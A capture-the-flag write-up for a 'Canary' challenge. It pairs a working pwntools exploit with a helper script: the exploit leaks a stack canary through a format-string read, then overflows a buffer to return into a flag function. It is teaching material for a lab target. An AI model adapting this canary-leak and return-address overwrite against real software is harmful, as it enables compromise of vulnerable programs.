Canary
Use pattern.py to flood the second input, then put a breakpoint at the line in greet which compares the canaries. Check rax using gdb and feed that value back into pattern.py: the offset is 56 bytes before the canary. Fuzz the format string output (one %N$lx at a time) until you find the position that is always 8 bytes long; that is the canary. Make a script that leaks the canary, then overflows the buffer with:
56 junk bytes + canary + 8 junk bytes + flag address
from pwn import *
import re

e = ELF("./canary")
p = remote("shell.actf.co", 20701)

# Skip the banner, then the prompt line for the first input
for _ in range(23):
    p.recvline()
p.recvline()

# First input is echoed through printf: stack slot 17 holds the canary
p.sendline(b"%17$lx")
flagaddr = 0x0000000000400787

output = p.recvline().decode()
num = re.findall(r"Nice to meet you, (.*)!", output)
canary = int(num[0], 16)
log.info("Canary: " + hex(canary))

firstpad = b"A" * 56          # Junk before the canary
canaryString = p64(canary)    # Put the leaked canary back so the check passes
lastpad = b"B" * 8            # Saved rbp
neweip = p64(flagaddr)        # Return into the flag function
payload = firstpad + canaryString + lastpad + neweip

# Second input is the overflowing read
p.sendline(payload)
log.info("Response: " + p.recvline().decode(errors="replace"))
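The two steps the writeup only describes in words, the pattern.py offset lookup and the "always 8 bytes long" canary-spotting heuristic, as an added, stand-alone example (not the author's script and not part of the challenge). It uses only the standard library: cyclic_pattern builds a Metasploit-style pattern, find_offset maps the value gdb shows in rax back to an offset, looks_like_canary applies the page's heuristic to a set of leaked values for one %N$lx slot, and build_payload reproduces the 56 + canary + 8 + address layout with struct instead of p64. The sample leak strings and the 56/8 paddings are constructed from this page; the fact that glibc on x86-64 keeps the canary's low byte zero is an extra check not stated on the page.

```python
import re
import struct
from itertools import product
from string import ascii_lowercase, ascii_uppercase, digits


def cyclic_pattern(length):
    """Metasploit-style pattern (Aa0Aa1...): every 3-byte unit is unique,
    so any 8-byte window read out of a register maps to exactly one offset."""
    out = bytearray()
    for upper, lower, digit in product(ascii_uppercase, ascii_lowercase, digits):
        out += (upper + lower + digit).encode()
        if len(out) >= length:
            break
    return bytes(out[:length])


def find_offset(pattern, reg_value):
    """reg_value is the little-endian 8-byte value gdb prints for rax at the
    canary comparison; return where those bytes sit in the pattern, or -1."""
    needle = struct.pack("<Q", reg_value)
    return pattern.find(needle)


LEAK_RE = re.compile(r"Nice to meet you, (.*)!")


def parse_leak(line):
    """Recover the %N$lx output from the program's greeting line."""
    match = LEAK_RE.search(line)
    return int(match.group(1), 16) if match else None


def looks_like_canary(samples):
    """Page heuristic for one stack slot: printed as a full 8 bytes (16 hex
    digits) on every run, and different on every run (it is re-randomised
    per process). glibc x86-64 also zeroes the low byte, so %lx ends in 00."""
    return (
        len(samples) > 1
        and all(len(s) == 16 and s.endswith("00") for s in samples)
        and len(set(samples)) == len(samples)
    )


def build_payload(canary, ret_addr, pad_before=56, pad_after=8):
    """Same layout as the exploit above: junk up to the canary, the leaked
    canary so the check passes, junk over saved rbp, then the return address."""
    return (
        b"A" * pad_before
        + struct.pack("<Q", canary)
        + b"B" * pad_after
        + struct.pack("<Q", ret_addr)
    )


if __name__ == "__main__":
    pat = cyclic_pattern(200)
    # Constructed: pretend gdb showed the 8 bytes that lie at offset 56
    rax = int.from_bytes(pat[56:64], "little")
    print("offset of rax bytes:", find_offset(pat, rax))
    # Constructed leak lines from two separate runs of the same %N$lx slot
    runs = ["Nice to meet you, 1b2c3d4e5f6a7800!", "Nice to meet you, 9f8e7d6c5b4a3900!"]
    leaks = [format(parse_leak(r), "x") for r in runs]
    print("slot looks like the canary:", looks_like_canary(leaks))
    print("payload length:", len(build_payload(parse_leak(runs[0]), 0x400787)))
```

Run it against several captured greeting lines per slot; a return address or a stack pointer prints with 6 or 12 hex digits and stays constant or drifts slightly, while the canary slot is the only one that passes all three tests.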